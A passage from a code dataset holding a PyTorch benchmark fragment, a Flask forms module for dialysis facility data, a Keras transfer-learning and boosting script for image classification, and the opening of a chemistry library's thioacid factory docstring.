input2)\n elapsed = time.time() - start\n forward_min = min(forward_min, elapsed)\n forward_time += elapsed\n output = output.mean()\n\n start = time.time()\n (output.mean()).backward()\n elapsed = time.time() - start\n backward_min = min(backward_min, elapsed)\n backward_time += elapsed\n\nscale = TIME_SCALES[args.scale]\nforward_min *= scale\nbackward_min *= scale\nforward_average = forward_time / args.runs * scale\nbackward_average = backward_time / args.runs * scale\n\nprint('Forward: {0:.3f}/{1:.3f} {4} | Backward {2:.3f}/{3:.3f} {4}'.format(\n forward_min, forward_average, backward_min, backward_average,\n args.scale))\n","repo_name":"jiawen-zhu/HQTrack","sub_path":"packages/Pytorch-Correlation-extension/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":706,"dataset":"github-code","pt":"40"} +{"seq_id":"36579699699","text":"from flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, SelectField, DecimalField \\\n 
,SelectMultipleField, widgets\nfrom wtforms.validators import DataRequired, Length\n\nwksht_codes = [('A000000','A'),('A10000','A-1'),('A200000','A-2'),('A30000A','A-3 Part A'),\n ('A30000B','A-3 Part B'),('A30000C','A-3 Part C'),('A400001','A-4 Part 1'),\n ('A400002','A-4 Part 2'),('B000000','B'),('B100000','B-1'),('C000000','C'),\n ('D000000','D'),('E000001','E Part 1'),('E000002','E Part 2'),('E100001','E-1 Part 1'),\n ('E100002','E-1 Part 2'),('F000000','F'),('F100000','F-1'),('S000001','S Part 1'),\n ('S000002','S Part 2'),('S000003','S Part 3'),('S100000','S-1'),('S200000','S-2')]\n\nfac_info_choices = [('medicare_id','Medicare ID'),('facility_name','Facility Name'),('address','Address'),\n ('city','City'),('county','County'),('zip_code','Zip Code'),('state','State'),\n ('non_for_profit','Non/For-Profit'),('dialysis_chain','Dialysis Chain')]\n\nutilization_choices = [('hemodialysis_treatments','Hemodialysis Treatments'),('peritoneal_treatments','Peritoneal Treatments'),\n ('home_hemo_treatments','Home Hemodialysis Treatments'),('home_peritoneal_treatment','Home Peritoneal Treatments'),\n ('total_treatments','Total Treatments'),('hemodialysis_patients','Hemodialysis Patients'),\n ('peritoneal_patients','Peritoneal Patients'),('home_dialysis_patients','Home Dialysis Patients'),\n ('transplant_received','Transplants Recieved'),('transplant_waitlist','Patients on Transplant Waitlist')]\n\nstaff_choices = [('physicians','Physicians'),('registered_nurses','Registered Nurses'),\n ('licensed_practical_nurses','Licensed Practical Nurses'),('nurses_aides','Nurses Aides'),\n ('technicians','Technicians'),('social_workers','Social Workers'),('dieticians','Dieticians'),\n ('administrative','Administrative'),('management','Management'),('other','Other')]\n\nfinance_choices = [('net_patient_revenue','Net Patient Revenue'),('operating_expenses','Operating Expenses'),\n ('net_income_patient_services','Net Income Patient Services'),('covid_19_income','Covid-19 Income'),\n ('other_income','Other Income'),('net_income','Net Income')]\n\nstate_choices = ['AK','AL', 'AR','AS','AZ','CA','CO','CT','DC','DE','FL','GA','GU','HI','IA','ID','IL' \n ,'IN','KS','KY','LA','MA','MD','ME','MI','MN','MO','MP','MS','MT','NC','ND','NE','NH'\n ,'NJ','NM','NV','NY','OH','OK','OR','PA','PR','RI','SC','SD','TN','TX','UT','VA','VI'\n ,'VT','WA','WI','WV','WY']\n\nchain_choices = [('DAVITA INC','DaVita Inc'),('FRESENIUS MEDICAL CARE N.A.','Fresenius Medical Care'),\n ('U.S. 
RENAL CARE INC.','US Renal Care'),('DIALYSIS CLINIC INC.','Dialysis Clinic Inc'),\n ('AMERICAN RENAL ASSOCIATES INC.','American Renal Associates Inc'),('SATELLITE HEALTHCARE INC.','Satellite Healthcare Inc'),\n ('UNIVERSITY OF UTAH','University of Utah'),('CENTERS FOR DIALYSIS CARE','Centers for Dialysis Care'),\n ('NORTHWEST KIDNEY CENTERS','Northwest Kidney Centers'),('WAKE FOREST UNIVERSITY','Wake Forest University'),\n ('DIALYZE HOLDINGS LLC','Dialyze Holdings LLC'),('PURE LIFE RENAL INC.','Pure Life Renal Inc'),\n ('GREENFIELD HEALTH SYSTEMS','Greenfield Health Systems'),('CA DIALYSIS MANAGEMENT SVCS INC','CA Dialysis Management Services Inc')]\n#forms for custom data\nclass FieldsForm(FlaskForm):\n worksheet = SelectField('Worksheet Code',choices = wksht_codes, validators=[DataRequired()])\n line_number = DecimalField('Line Number', places=2, validators=[DataRequired()])\n column_number = DecimalField('Column Number', places=2,validators=[DataRequired()])\n var_name = StringField('Variable Name', validators=[DataRequired(),Length(min=0,max=40)])\n submit = SubmitField('+ Add to Cart')\n \nclass ClearForm(FlaskForm):\n clear = SubmitField('Clear All', validators=[DataRequired()])\n\nclass DownloadForm(FlaskForm):\n download = SubmitField('Download Dataset', validators=[DataRequired()])\n\n#forms for preset data\nclass MultiCheckboxField(SelectMultipleField):\n widget = widgets.ListWidget(prefix_label=False)\n option_widget = widgets.CheckboxInput()\n\nclass PresetInfoForm(FlaskForm):\n facility_info = MultiCheckboxField('Facility Information', choices=fac_info_choices)\n utilization = MultiCheckboxField('Utilization Data', choices = utilization_choices)\n finance = MultiCheckboxField('Financial Statement', choices = finance_choices)\n staff = MultiCheckboxField('Employee Data', choices=staff_choices)\n submit = SubmitField('+ Add Variables')\n\nclass FacFilterForm(FlaskForm):\n years = [(i,i) for i in range(2022,2010,-1)]\n year_field = MultiCheckboxField('Year', choices=years)\n states = [(i,i) for i in state_choices]\n state_field = MultiCheckboxField('State/Territory', choices=states)\n chain_field = MultiCheckboxField('Dialysis Chain', choices=chain_choices)\n submit = SubmitField('+ Add Criteria')\n\n\"\"\"\nclass WorksheetForm(FlaskForm):\n worksheet = SelectField('Worksheet Code', choices = wksht_codes, validators=[DataRequired()])\n submit = SubmitField('Submit')\n\"\"\"\n","repo_name":"alogemann/open-hospital-data","sub_path":"app_package/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14666790227","text":"# -*- coding: utf-8 -*-\n# @Author: romaingautronapt\n# @Date: 2018-01-15 14:59:20\n# @Last modified by: Luc Blassel\n# @Last modified time: 2018-01-28T17:23:09+01:00\n\"\"\"\ninspired by https://blog.keras.io/building-powerful-image-classification-models-using-very-little-data.html\n\"\"\"\nimport numpy as np\nimport time\nimport os.path\nfrom binariser import *\nfrom dataProcessing import *\nfrom keras import applications\nfrom keras import optimizers\nfrom keras.models import Sequential, Model, load_model\nfrom keras.layers import Flatten, Dense, Dropout, GlobalAveragePooling2D, Conv2D, MaxPooling2D, Activation\nfrom keras import backend as k\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom callbackBoosting import *\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom dataLoader import *\nfrom pathlib import 
Path\nfrom keras.utils.np_utils import to_categorical\nimport pandas as pd\nimport copy as cp\nimport _pickle as pickle\nfrom itertools import chain\n\ndownloader(url,path)\nmodels_path = \"models\"\n\n# checks if models directory already exists, and iuf not creates it\n\ndataPath = models_path\nif not os.path.exists(dataPath):\n\tprint(\"creating\" ,dataPath, \"directory\")\n\tos.makedirs(dataPath)\n\n\n#####################################\n# BUILDING MODEL FOR TWO CLASSES #\n#####################################\n\ndef bottom_layers_builder(originalSize,resizeFactor):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\t\"\"\"\n\timg_size = originalSize*resizeFactor\n\n\tif k.image_data_format() == 'channels_first':\n\t\tinput_shape = (3, img_size, img_size)\n\telse:\n\t\tinput_shape = (img_size, img_size, 3)\n\n\t#model = applications.InceptionV3(weights = \"imagenet\", include_top=False, input_shape = (img_size, img_size, 3))\n\tmodel = applications.Xception(weights = \"imagenet\", include_top=False, input_shape = input_shape)\n\n\tfor layer in model.layers :\n\t\tlayer.trainable = False\n\treturn model\n\ndef create_generators(classes,path_to_train,path_to_validation,originalSize,resizeFactor,batch_size,transformation_ratio):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\t\"\"\"\n\timg_size = originalSize*resizeFactor\n\n\ttrain_datagen = ImageDataGenerator(rescale=1. / 255,\n\t\t\t\t\t\t\t\t\t rotation_range=transformation_ratio,\n\t\t\t\t\t\t\t\t\t shear_range=transformation_ratio,\n\t\t\t\t\t\t\t\t\t zoom_range=transformation_ratio,\n\t\t\t\t\t\t\t\t\t cval=transformation_ratio,\n\t\t\t\t\t\t\t\t\t horizontal_flip=True,\n\t\t\t\t\t\t\t\t\t vertical_flip=True)\n\n\tvalidation_datagen = ImageDataGenerator(rescale=1. / 255)\n\n\ttest_datagen = ImageDataGenerator(rescale=1. 
/ 255)\n\n\ttrain_generator = train_datagen.flow_from_directory(path_to_train,target_size=(img_size, img_size),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tbatch_size=batch_size,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tclasses = classes,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tclass_mode='binary',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tshuffle = False)\n\n\tvalidation_generator = validation_datagen.flow_from_directory(path_to_validation,target_size=(img_size, img_size),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t classes = classes,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t batch_size=batch_size,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t class_mode='binary',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t shuffle = False)\n\n\ttest_generator = test_datagen.flow_from_directory(path_to_validation,target_size=(img_size, img_size),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t classes = classes,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t batch_size=batch_size,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t class_mode='binary',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t shuffle = False)\n\n\treturn train_generator,validation_generator,test_generator\n\ndef save_bottleneck_features(model,train_generator,validation_generator,test_generator,trainNum,valNum,testNum,batch_size,recompute_transfer_values):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\t\"\"\"\n\tfile1 = Path('bottleneck_features_train.npy')\n\tif not file1.is_file() or recompute_transfer_values:\n\t\tprint('bottleneck_features_train.npy')\n\t\tbottleneck_features_train = model.predict_generator(train_generator, trainNum // batch_size, use_multiprocessing=False, verbose=1)\n\t\tnp.save(open('bottleneck_features_train.npy', 'wb'), bottleneck_features_train)\n\n\n\tfile2 = Path('bottleneck_features_val.npy')\n\tif not file2.is_file() or recompute_transfer_values:\n\t\tprint('bottleneck_features_val.npy')\n\t\tbottleneck_features_val = model.predict_generator(validation_generator, valNum // batch_size, use_multiprocessing=False, verbose=1)\n\t\tnp.save(open('bottleneck_features_val.npy', 'wb'), bottleneck_features_val)\n\n\tfile3 = Path('bottleneck_features_test.npy')\n\tif not file3.is_file() or recompute_transfer_values:\n\t\tprint('bottleneck_features_test.npy')\n\t\tbottleneck_features_test = model.predict_generator(test_generator, testNum // batch_size, use_multiprocessing=False, verbose=1)\n\t\tnp.save(open('bottleneck_features_test.npy', 'wb'), bottleneck_features_test)\n\ndef top_layer_builder(lr,num_of_classes):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\t\"\"\"\n\ttrain_data = np.load(open('bottleneck_features_train.npy',\"rb\"))\n\tmodel = Sequential()\n\tmodel.add(Flatten(input_shape=train_data.shape[1:]))\n\tmodel.add(Dense(1024, activation='relu'))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Dense(512, activation='relu'))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))\n\t#model.compile(optimizer='rmsprop',loss='binary_crossentropy',metrics=['accuracy'])\n\tmodel.compile(optimizer = optimizers.Adam(lr=lr,amsgrad=True), loss='binary_crossentropy', metrics=['accuracy'])\n\treturn model\n\ndef top_layer_trainer(train_top_model,top_model,epochs,batch_size,trainNum,valNum,testNum,lr,train_generator,validation_generator,test_generator,path_to_best_model):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\t\"\"\"\n\tfile_exists = False\n\tfile = Path(path_to_best_model)\n\tif file.is_file():\n\t\tfile_exists = True\n\n\tif not file_exists or train_top_model :\n\t\ttrain_data = np.load(open('bottleneck_features_train.npy',\"rb\"))\n\n\t\tvalidation_data = 
np.load(open('bottleneck_features_val.npy',\"rb\"))\n\n\t\ttest_data = np.load(open('bottleneck_features_test.npy',\"rb\"))\n\n\t\ttrain_labels,validation_labels,test_labels = train_generator.classes[:trainNum],validation_generator.classes[:valNum],test_generator.classes[:testNum]\n\n\t\tearlystop = EarlyStopping(monitor='val_acc', min_delta=0.0001, patience=5, verbose=1, mode='auto')\n\n\t\tcheckpoint = ModelCheckpoint(path_to_best_model, monitor='val_loss', verbose=1, save_best_only=True, period=1,mode='min')\n\n\t\ttop_model.fit(train_data, train_labels,\n\t\t\t\t  epochs=epochs,\n\t\t\t\t  batch_size=batch_size,\n\t\t\t\t  validation_data=(validation_data, validation_labels),\n\t\t\t\t  callbacks = [earlystop,checkpoint],\n\t\t\t\t  shuffle = True)\n\n\t\tprint(top_model.evaluate(test_data, test_labels, verbose=1))\n\ndef full_model_builder(path_to_best_top_model,bottom_model,top_model,lr):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\t\"\"\"\n\ttop_model.load_weights(path_to_best_top_model)\n\tfull_model = Model(inputs= bottom_model.input, outputs= top_model(bottom_model.output))\n\tfull_model.compile(optimizer = optimizers.Adam(lr=lr,amsgrad=True), loss='binary_crossentropy', metrics=['accuracy'])\n\tfor layer in full_model.layers:\n\t\tlayer.trainable = False\n\treturn full_model\n\n\n\n############################################################################\n# TRAINING FIRST LAYERS #\n############################################################################\n\ndef first_layers_modified_model_builder(model,layerLimit,reinitialize_bottom_layers=False):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\n\tthis function returns a copy of the model whose first layers are made trainable, optionally with reinitialized weights\n\tINPUTS :\n\t- model to modify\n\t- layerLimit : index bounding the first layers to modify (see layer.name)\n\tOUTPUTS :\n\t- copy of the modified model\n\t\"\"\"\n\tmodel_copy = cp.deepcopy(model)\n\tfor layer in model_copy.layers[:layerLimit]:\n\n\t\tsession = k.get_session()\n\t\tlayer.trainable = True\n\t\tif reinitialize_bottom_layers :\n\t\t\tfor v in layer.__dict__:\n\t\t\t\tv_arg = getattr(layer,v)\n\t\t\t\tif hasattr(v_arg,'initializer'):\n\t\t\t\t\tinitializer_method = getattr(v_arg, 'initializer')\n\t\t\t\t\tinitializer_method.run(session=session)\n\t\t\t\t\tprint('reinitializing layer {}.{}'.format(layer.name, v))\n\n\tfor layer in model_copy.layers[layerLimit:]:\n\t\tlayer.trainable = False\n\n\treturn model_copy\n\ndef first_layers_modified_model_trainer(model,train_generator,validation_generator,test_generator,epochs,threshold):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\tthis function trains models from [first_layers_modified_model_builder] function\n\t\"\"\"\n\tmodel.fit_generator(train_generator, epochs=epochs, verbose=1, callbacks=[callbackBoosting(threshold,\"val_acc\")], validation_data=validation_generator, use_multiprocessing=False, shuffle=True)\n\tscore = model.evaluate_generator(test_generator)\n\tprint(\"projector score : \", score)\n
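\n# A minimal standalone sketch (added for clarity; not called by the pipeline) of the\n# AdaBoost-style update used in booster() below: each round computes\n# alpha = 0.5*ln((1-error)/error), rescales a sample's weight by exp(-alpha) when the\n# prediction was right and exp(+alpha) when it was wrong, then renormalises.\ndef adaboost_weight_update(prob, correct, alpha):\n\t# prob: 1-D numpy array of sample weights; correct: boolean array of the same shape\n\tprob = np.where(correct, prob * np.exp(-alpha), prob * np.exp(alpha))\n\treturn prob / np.sum(prob)\n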
\ndef small_net_builder(originalSize,resizeFactor,lr):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\t\"\"\"\n\timg_size = originalSize*resizeFactor\n\n\tif k.image_data_format() == 'channels_first':\n\t\tinput_shape = (3, img_size, img_size)\n\telse:\n\t\tinput_shape = (img_size, img_size, 3)\n\n\tmodel = Sequential()\n\tmodel.add(Conv2D(32, (3, 3), input_shape=input_shape))\n\tmodel.add(Activation('relu'))\n\tmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\n\tmodel.add(Conv2D(32, (3, 3)))\n\tmodel.add(Activation('relu'))\n\tmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\n\tmodel.add(Conv2D(64, (3, 3)))\n\tmodel.add(Activation('relu'))\n\tmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\n\tmodel.add(Flatten())\n\tmodel.add(Dense(64))\n\tmodel.add(Activation('relu'))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Dense(34))\n\tmodel.add(Activation('relu'))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Dense(1))\n\tmodel.add(Activation('sigmoid'))\n\n\tmodel.compile(optimizer = optimizers.Adam(lr=lr,amsgrad=True), loss='binary_crossentropy', metrics=['accuracy'])\n\n\treturn model\n\ndef from_generator_to_array(classes,path_to_train,path_to_validation,originalSize,resizeFactor,transformation_ratio,trainNum,valNum,testNum):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\t\"\"\"\n\timg_size = originalSize*resizeFactor\n\n\ttrain_datagen = ImageDataGenerator(rescale=1. / 255,\n\t\t\t\t\t\t\t\t\t   rotation_range=transformation_ratio,\n\t\t\t\t\t\t\t\t\t   shear_range=transformation_ratio,\n\t\t\t\t\t\t\t\t\t   zoom_range=transformation_ratio,\n\t\t\t\t\t\t\t\t\t   cval=transformation_ratio,\n\t\t\t\t\t\t\t\t\t   horizontal_flip=True,\n\t\t\t\t\t\t\t\t\t   vertical_flip=True)\n\n\tvalidation_datagen = ImageDataGenerator(rescale=1. / 255)\n\n\ttest_datagen = ImageDataGenerator(rescale=1. / 255)\n\n\ttrain_generator = train_datagen.flow_from_directory(path_to_train,target_size=(img_size, img_size),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tbatch_size=trainNum,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tclasses = classes,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tclass_mode='binary',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tshuffle = False)\n\n\tvalidation_generator = validation_datagen.flow_from_directory(path_to_validation,target_size=(img_size, img_size),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t   classes = classes,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t   batch_size=valNum,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t   class_mode='binary',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t   shuffle = False)\n\n\ttest_generator = test_datagen.flow_from_directory(path_to_validation,target_size=(img_size, img_size),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t   classes = classes,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t   batch_size=testNum,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t   class_mode='binary',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t   shuffle = False)\n\tx_train,y_train = train_generator.next()\n\tx_val,y_val = validation_generator.next()\n\tx_test,y_test = test_generator.next()\n\n\treturn x_train,y_train,x_val,y_val,x_test,y_test\n\n\n#######################################################\n# BOOSTING #\n#######################################################\ndef take(tab,indexes):\n\toutput = np.zeros(tab.shape)\n\n\tc=0\n\tfor i in indexes:\n\t\toutput[c] = tab[i]\n\t\tc+=1\n\treturn output\n\n# def booster(full_model,times,x_train,y_train_bin,epochs,threshold,layerLimit,**kwargs):\ndef booster(full_model,x_train,y_train,x_val,y_val,epochs,threshold,layerLimit,times,bigNet,originalSize,resizeFactor,lr,proba_threshold):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\t\"\"\"\n\ttrain_length = len(x_train)\n\tmodel_list = []\n\terror_list = []\n\talpha_list = []\n\n\tif train_length==0:\n\t\traise ValueError(\"length of training set equals 0\")\n\n\tprob = np.repeat(1/train_length, train_length)\n\tindexes = list(range(train_length))\n\n\tfor time in range(times):\n\n\t\tcurrent_model_path = os.path.join(models_path,\"model_\"+str(time)+\".h5\")\n\n\t\ttrain_boost_indexes = np.random.choice(indexes,p=prob,size=train_length,replace=True)\n\t\tx_train_boost = take(x_train,train_boost_indexes)\n\t\ty_train_boost = 
take(y_train,train_boost_indexes)\n\n\t\tif bigNet :\n\t\t\tcurrent_model = first_layers_modified_model_builder(full_model,layerLimit)\n\t\telse :\n\t\t\tcurrent_model = small_net_builder(originalSize,resizeFactor,lr)\n\n\t\terror = 0\n\t\twhile error == 1 or error == 0 :\n\t\t\tif bigNet :\n\t\t\t\tcurrent_model = first_layers_modified_model_builder(full_model,layerLimit)\n\t\t\telse:\n\t\t\t\tcurrent_model = small_net_builder(originalSize,resizeFactor,lr)\n\n\t\t\tcurrent_model.fit(x_train_boost, y_train_boost, epochs=epochs, verbose=1, callbacks=[callbackBoosting(threshold,\"acc\")], shuffle=True)\n\n\t\t\terror = 1 - current_model.evaluate(x_val, y_val, verbose=1)[1]\n\t\talpha = .5*np.log((1-error)/error)\n\n\t\terror_list.append(error)\n\t\t# model_list.append(current_model)\n\n\t\tmodel_list.append(current_model_path) #adds model path to list\n\t\tcurrent_model.save(current_model_path) #saves model to disk\n \n\t\talpha_list.append(alpha)\n\n\t\tpredicted_probs = current_model.predict(x_train)\n\t\tpredicted_classes = []\n\t\tdel current_model #frees up memory space\n\n\n\t\tfor predicted_prob in predicted_probs:\n\t\t\tif predicted_prob >= proba_threshold:\n\t\t\t\tpredicted_classes.append(1)\n\t\t\telse :\n\t\t\t\tpredicted_classes.append(0)\n\n\t\tfor i in range(len(predicted_classes)):\n\t\t\tif predicted_classes[i] == y_train[i]:\n\t\t\t\tprob[i] = prob[i]*np.exp(-alpha)\n\t\t\telse:\n\t\t\t\tprob[i] = prob[i]*np.exp(alpha)\n\t\tprob = prob / np.sum(prob)\n\n\treturn model_list, error_list, alpha_list\n\ndef prediction_boosting(x,model_list, alpha_list,proba_threshold):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\t\"\"\"\n\tn_samples = len(x)\n\tn_models = len(model_list)\n\tresults = []\n\tpredicted_class_list = []\n\tc = 0\n\tfor model_name in model_list:\n\t\tprint(\"beginning prediction for model :\",c)\n\n\t\tmodel = load_model(model_name) #loads model from disk\n\t\tprobas = np.array(model.predict(x))\n\t\tbooleans = probas >= proba_threshold\n\t\tbooleans = list(chain(*booleans))\n\t\tto_append = []\n\t\tfor boolean in booleans:\n\t\t\tif boolean:\n\t\t\t\tto_append.append(1)\n\t\t\telse:\n\t\t\t\tto_append.append(-1)\n\t\tpredicted_class_list.append(to_append)\n\t\tprint(\"ending prediction for model :\",c)\n\t\tc +=1\n\n\tpredicted_class_list = np.array(predicted_class_list)\n\tpredicted_class_list.reshape((n_models,n_samples))\n\tpredicted_class_list = np.transpose(predicted_class_list)\n\talpha_list = np.array(alpha_list)\n\traw_results = np.dot(predicted_class_list,alpha_list)\n\n\tfor raw_result in raw_results:\n\t\tif raw_result >=0:\n\t\t\tresults.append(1)\n\t\telse:\n\t\t\tresults.append(0)\n\treturn results\n\ndef accuracy(y_true,y_pred):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\t\"\"\"\n\tif isinstance(y_true,np.ndarray):\n\t\ty_true = y_true.tolist()\n\tif isinstance(y_pred,np.ndarray):\n\t\ty_pred = y_pred.tolist()\n\tbool_res = []\n\tfor i in range(len(y_true)):\n\t\tbool_res.append(y_true[i] == y_pred[i])\n\tint_res = list(map(int,bool_res))\n\taccuracy = np.sum(int_res)/len(y_true)\n\treturn accuracy\n\ndef main():\n\t\"\"\" this function stands for testing purposes\n\t\"\"\"\n\tclasses_source = ['dog','truck']\n\tclasses_target = ['deer','horse']\n\tnum_of_classes = len(classes_source)\n\n\tbatch_size_source = 10\n\ttransformation_ratio = .05\n\toriginalSize = 32\n\tresizeFactor = 5\n\tpath_to_train = path + \"train\"\n\tpath_to_validation = path + \"validation\"\n\tpath_to_test = path + \"test\"\n\n\tpath_to_best_top_model = 
\"best_top_model.hdf5\"\n\n\ttrainNum_source = 7950\n\tvalNum_source = 2040\n\ttestNum_source = 2040\n\ttrainNum_target = 8010\n\tvalNum_target = 1980\n\ttestNum_target = 1980\n\n\tlr_source = 0.0001\n\tepochs_source = 50\n\n\trecompute_transfer_values = False\n\ttrain_top_model = False\n\n\tbottom_model = bottom_layers_builder(originalSize,resizeFactor)\n\ttrain_generator_source,validation_generator_source,test_generator_source = create_generators(classes_source,path_to_train,path_to_validation,originalSize,resizeFactor,batch_size_source,transformation_ratio)\n\tpstest = pd.Series(test_generator_source.classes[:testNum_source])\n\tcounts = pstest.value_counts()\n\tprint(\"test classes \",counts)\n\tpstrain = pd.Series(train_generator_source.classes[:trainNum_source])\n\tcounts = pstrain.value_counts()\n\tprint(\"train classes \",counts)\n\tsave_bottleneck_features(bottom_model,train_generator_source,validation_generator_source,test_generator_source,trainNum_source,valNum_source,testNum_source,batch_size_source,recompute_transfer_values)\n\ttop_model = top_layer_builder(lr_source,num_of_classes)\n\ttop_layer_trainer(train_top_model,top_model,epochs_source,batch_size_source,trainNum_source,valNum_source,testNum_source,lr_source,train_generator_source,validation_generator_source,test_generator_source,path_to_best_top_model)\n\ttop_model_init = top_layer_builder(lr_source,num_of_classes)\n\tfull_model = full_model_builder(path_to_best_top_model,bottom_model,top_model_init,lr_source)\n\t# full_model_score = full_model.evaluate_generator(test_generator_source)\n\t# print(full_model_score)\n\n\tlayerLimit = 15\n\tepochs_target = 100\n\tlr_target = 0.0001\n\tbatch_size_target = 10\n\tthreshold = .65\n\treinitialize_bottom_layers = False\n\tbigNet = False\n\ttimes = 100\n\n\t# train_generator_target,validation_generator_target,test_generator_target = create_generators(classes_target,path_to_train,path_to_validation,originalSize,resizeFactor,batch_size_target,transformation_ratio)\n\t# first_layers_modified_model = first_layers_modified_model_builder(full_model,layerLimit,reinitialize_bottom_layers)\n\t# first_layers_modified_model_score = first_layers_modified_model.evaluate_generator(test_generator_target)\n\t# print(first_layers_modified_model_score)\n\t# first_layers_modified_model_trainer(first_layers_modified_model,train_generator_target,validation_generator_target,test_generator_target,epochs_target,threshold)\n\n\t# small_net_builder= small_net_builder(originalSize,resizeFactor,lr)\n\t# first_layers_modified_model_trainer(small_net_builder,train_generator_target,validation_generator_target,test_generator_target,epochs_target,threshold)\n\n\tproba_threshold = .5\n\tx_train_target,y_train_target,x_val_target,y_val_target,x_test_target,y_test_target = from_generator_to_array(classes_target,path_to_train,path_to_validation,originalSize,resizeFactor,transformation_ratio,trainNum_target,valNum_target,testNum_target)\n\tmodel_list, error_list, alpha_list = booster(full_model,x_train_target,y_train_target,x_val_target,y_val_target,epochs_target,threshold,layerLimit,times,bigNet,originalSize,resizeFactor,lr_target,proba_threshold)\n\t# pickler = pickle.Pickler(open('alpha_list.pkl', 'wb'), -1)\n\t# pickler.dump(alpha_list)\n\t# print(model_list, error_list, alpha_list)\n\t# c = 0\n\t# for model in model_list:\n\t# \tmodel_path = \"model\"+ str(c) +\".h5\"\n\t# \tmodel.save(model_path)\n\t# \tc+=1\n\tpredicted_classes = prediction_boosting(x_test_target,model_list, alpha_list,proba_threshold)\n\t# 
np.save(open('boosting_classes.npy', 'wb'), predicted_classes)\n\tprint(accuracy(y_test_target,predicted_classes))\n\n\t# model_list = []\n\t# for time in range(times):\n\t# \tpath_model = \"model\"+ str(time) +\".h5\"\n\t# \tmodel = load_model(path_model)\n\t# \tmodel_list.append(model)\n\t# with open('result_list.pkl', 'rb') as pickle_file:\n\t# \talpha_list = pickle.load(pickle_file)\n\n\t# predicted_classes = prediction_boosting(x_test_target,model_list, alpha_list,proba_threshold)\n\tprint(accuracy(y_test_target,predicted_classes))\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"romaingautron/transboost","sub_path":"kerasImplementation/boosting.py","file_name":"boosting.py","file_ext":"py","file_size_in_byte":19359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14431719116","text":"\"\"\"\nThioacid Factory\n================\n\n\"\"\"\n\n\nfrom stk._internal.functional_group_factories.functional_group_factory import (\n FunctionalGroupFactory,\n)\nfrom stk._internal.functional_group_factories.utilities import get_atom_ids\nfrom stk._internal.functional_groups.thioacid import Thioacid\n\n\nclass ThioacidFactory(FunctionalGroupFactory):\n \"\"\"\n Creates :class:`.Thioacid` instances.\n\n Creates functional groups from substructures, which match the\n ``[*][C](=[O])[S][H]`` functional group string.\n\n Examples\n --------\n *Creating Functional Groups with the Factory*\n\n You want to create a building block which has :class:`.Thioacid`\n functional groups. You want the carbon atom in those functional\n groups to be the *bonder* atom, and SH group to be the *deleter*\n atoms.\n\n .. testcode:: creating-functional-groups-with-the-factory\n\n import stk\n\n building_block = stk.BuildingBlock(\n smiles='SC(=O)CC(=O)S',\n functional_groups=(stk.ThioacidFactory(), ),\n )\n\n .. testcode:: creating-functional-groups-with-the-factory\n :hide:\n\n assert all(\n isinstance(functional_group, stk.Thioacid)\n for functional_group\n in building_block.get_functional_groups()\n )\n assert building_block.get_num_functional_groups() == 2\n\n *Changing the Bonder and Deleter Atoms*\n\n You want to create a building block which has :class:`.Thioacid`\n functional groups. You want the carbon atom to be the *bonder*\n atom and the oxygen atom to be the *deleter* atom.\n\n .. testcode:: changing-the-bonder-and-deleter-atoms\n\n import stk\n\n thioacid_factory = stk.ThioacidFactory(\n # The index of the carbon atom in the functional\n # group string (see docstring) is 1.\n bonders=(1, ),\n # The index of the oxygen atom in the functional\n # group string (see docstring) is 2.\n deleters=(2, ),\n )\n building_block = stk.BuildingBlock(\n 